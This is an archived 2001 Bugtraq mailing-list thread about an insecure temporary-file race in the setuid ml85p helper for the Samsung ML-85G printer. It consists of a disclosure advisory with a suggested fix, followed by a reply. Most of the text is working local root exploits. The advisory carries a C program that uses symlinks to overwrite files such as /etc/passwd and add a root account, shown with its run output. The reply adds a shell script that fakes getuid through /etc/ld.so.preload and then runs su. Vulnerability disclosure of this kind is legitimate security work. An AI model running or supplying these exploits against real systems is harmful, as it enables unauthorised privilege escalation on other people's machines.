6756271 2001-07-16 23:42 -0600 /260 rader/ <aleph1@securityfocus.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-17 08:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18024>
Ärende: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
------------------------------------------------------------
From: aleph1@securityfocus.com
To: bugtraq@securityfocus.com
Message-ID: <20010716234230.O9567@securityfocus.com>
----- Forwarded message from Charles Stevenson <core@ezlink.com> -----
From: Charles Stevenson <core@ezlink.com>
To: Bugtraq <bugtraq@securityfocus.com>, chmouel@mandrakesoft.com
CC: Kevin Finisterre <dotslash@snosoft.com>
Subject: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake:
ghostscript package)
Date: Tue, 10 Jul 2001 16:27:39 -0600
Message-ID: <3B4B815B.B1A65869@ezlink.com>
NOTE TO MODERATOR: PLEASE HOLD UNTIL 16 JULY 2001 TO ALLOW VENDOR TIME
TO RELEASE AN UPDATE
Author(s): Charles Stevenson, core at ezlink dot com
Kevin Finisterre, dotslash at snosoft dot com
Date Published: 2001 JULY 16
Revision: 1.0
Advisory ID: N/A
Bugtraq ID: 3008
CVE CAN: Non currently assigned.
Title: ml85p Linux Helper Binary for Samsung ML-85G Printer Insecure
Temporary File Creation
Class: Insecure Temporary File Creation Race Condition
Remotely Exploitable: No
Locally Exploitable: Yes
Vulnerability Description:
The Samsung ML-85G GDI printer driver (helper binary to me;) suffers
from insecure temporary file creation practices. It is possible to
create files as root which can lead to root access.
Vulnerable Systems:
This exploit should be specific to the x86 architecture although rare
cases may exist (the symlik attack is not plaform dependant). All
systems running ml85p built from tarball are assumed to be
vulnerable. ml85p is also distributed by MandrakeSoft in the
ghostscript RPM. The permissions are more stringent and would
require sys priveleges. I tested it on ml85p built from the tarball
on my Debian system and Kevin tested on his Mandrake system.
> [d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
> -rwsr-x--- 1 root sys 11676 Mar 30 11:43 /usr/bin/ml85p*
Mandrake:
ghostscript-5.50-71mdk.i586.rpm
ghostscript-5.50-67mdk.i586.rpm
ghostscript-5.50-67mdk.i586.rpm
Solution/Vendor Information/Workaround:
The author's site and the source code can be found at:
http://members.nbci.com/rpragana/gdiprinters.html
Recommended fix... use mkstemp() instead of the homegrown code:
line 726: sprintf(gname,"/tmp/ml85g%d",time(0));
Quick fix... chmod 0755 `which ml85p`
Vendor notified on: 2001 JULY 10
Credits:
The credit goes to my good friend Kevin Finisterre for discovering
the vulnerability, I (Charles Stevenson) wrote the proof-of-concept
exploit.
This advisory was drafted with the help of the SecurityFocus.com
Vulnerability Help Team. For more information or assistance drafting
advisories please mail vulnhelp@securityfocus.com.
Technical Description - Exploit/Concept Code:
[-(core@devastator:~/bleedingedge)> ./ml85p-xpl /etc/rc.owned
owned::0:0:root:/root:/bin/bash
ml85p-xpl.c by core (c) 2001
> backing up /etc/rc.owned to /tmp/ez.n6ZT1m
/bin/cp: cannot stat `/etc/rc.owned': No such file or directory
/bin/touch: getting attributes of `/etc/rc.owned': No such file or
directory
> creating a lot of symlinks
Running a few times since I'm lazy.
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
Wrong file format.
file position: f
-rw-rw-rw- 1 root staff 0 Jul 10 13:14 /etc/rc.owned
-rw-rw-rw- 1 root staff 32 Jul 10 13:14 /etc/rc.owned
owned::0:0:root:/root:/bin/bash
> cleaning up
Don't forget to `cp /tmp/ez.n6ZT1m /etc/rc.owned && touch -r
/tmp/ez.n6ZT1m /etc/rc.owned`!
All done. Enjoy!
You'll want to download this from my website or take care to
reconstruct the lines which got wrapped.
http://www.ezlink.com/~core/hot/ml85p-xpl.c
/* ml85p-xpl.c
*
* Quick hack to exploit ml85p
*
* Simply run it with the file you want to create/overwrite
* and the data you wish to place in the file.
*
* Example:
*
* $ gcc -g -Wall ml85p-xpl.c -o ml85p-xpl
* $ ./ml85p-xpl /etc/passwd owned::0:0:root:/root:/bin/bash
*
* Then login as owned... etc..
*
* by Charles Stevenson <core@ezlink.com>
*
* July 10 2001
*
* exploit discovered by KF <dotslash@snosoft.com>
*
* shoutz b10z and word to Kevin for the quick tag team :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <time.h>
#define TEMPFILE "/tmp/ez.XXXXXX"
#define BRUTE 10
void usage(char*);
int main(int argc, char **argv){
char tempfile[128] = TEMPFILE;
int fd, i;
time_t the_time;
char temp[512];
if (argc < 3){
usage(argv[0]);
}
if((fd = mkstemp(tempfile))==-1){
fprintf(stderr, "Error creating %s!\n",tempfile);
exit(1);
}
/* begin lazy slacker coding */
fprintf(stderr, "ml85p-xpl.c by core (c) 2001\n");
fprintf(stderr, "> backing up %s to %s\n", argv[1], tempfile);
/* backup old file */
sprintf(temp, "/bin/cp %s %s", argv[1], tempfile);
system(temp);
/* set the date/time */
sprintf(temp, "/bin/touch -r %s %s", argv[1], tempfile);
system(temp);
the_time = time(NULL);
fprintf(stderr, "> creating a lot of symlinks\n");
for (i=0;i<BRUTE;i++){
sprintf(temp, "/tmp/ml85g%d", the_time+i);
symlink(argv[1], temp);
}
sprintf(temp, \
"echo \"b1nary 0utlawz\">file; umask 000 && ml85p -sf file\n", \
argv[2]);
fprintf(stderr, "Running a few times since I'm lazy.\n");
for (i=0;i<BRUTE;i++){
system(temp);
}
sprintf(temp, "/bin/ls -l %s", argv[1]);
system(temp);
sprintf(temp, "echo \"%s\" > %s", argv[2], argv[1]);
system(temp);
sprintf(temp, "/bin/ls -l %s", argv[1]);
system(temp);
sprintf(temp, "/bin/cat %s", argv[1]);
system(temp);
fprintf(stderr, "> cleaning up\n");
sprintf(temp, "/bin/rm -f /tmp/ml85*");
system(temp);
fprintf(stderr, \
"Don't forget to `cp %s %s && touch -r %s %s`!\n",tempfile,\
argv[1], tempfile, argv[1]);
fprintf(stderr, "All done. Enjoy!\n");
return 0;
}
void usage(char *name){
fprintf(stderr, "usage: %s <filename> <data>\n", name);
exit(1);
}
/* EOF */
Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an as is
condition. There are no warranties with regard to this
information. In no event shall the author(s) be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the
user's own risk.
----- End forwarded message -----
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
(6756271) / <aleph1@securityfocus.com>/---(Ombruten)
6760669 101-07-17 18:35 +0000 /69 rader/ <suid@sneakerz.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-17 22:02 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18048>
Ärende: Re: Samsung ML-85G Printer Linux Helper/Driver Binary Exploit (Mandrake: ghostscript package)
------------------------------------------------------------
From: suid@sneakerz.org
To: bugtraq@securityfocus.com
Message-ID: <200107171826.f6HIQjP18606@jawa.chilli.net.au>
Why code the exploit in C if you were just going to sprintf();
system() everything anyway? This is a bad exploit for a lame bug. I
found this in april and wrote this exploit to muck around with
/etc/ld.so.preload as a means of elevating privildges from symlink
attacks locally. old news but still. this ml85 bug appears in Linux
Mandrake 8.0. Thing is, this program is mode 4750 root:sys so
whatever...
suid
----
#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute
# ml85p.
echo "** ml85p exploit"
# set the required umask
umask 0
# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
echo "** this exploit requires that /usr/bin/ml85p is setuid
and executable."
exit 1
fi
if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
echo "** this exploit requires that /etc/ld.so.preload does not exist."
exit 1
fi
echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"
echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_
echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o
echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so
without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so
(6760669) / <suid@sneakerz.org>/----------(Ombruten)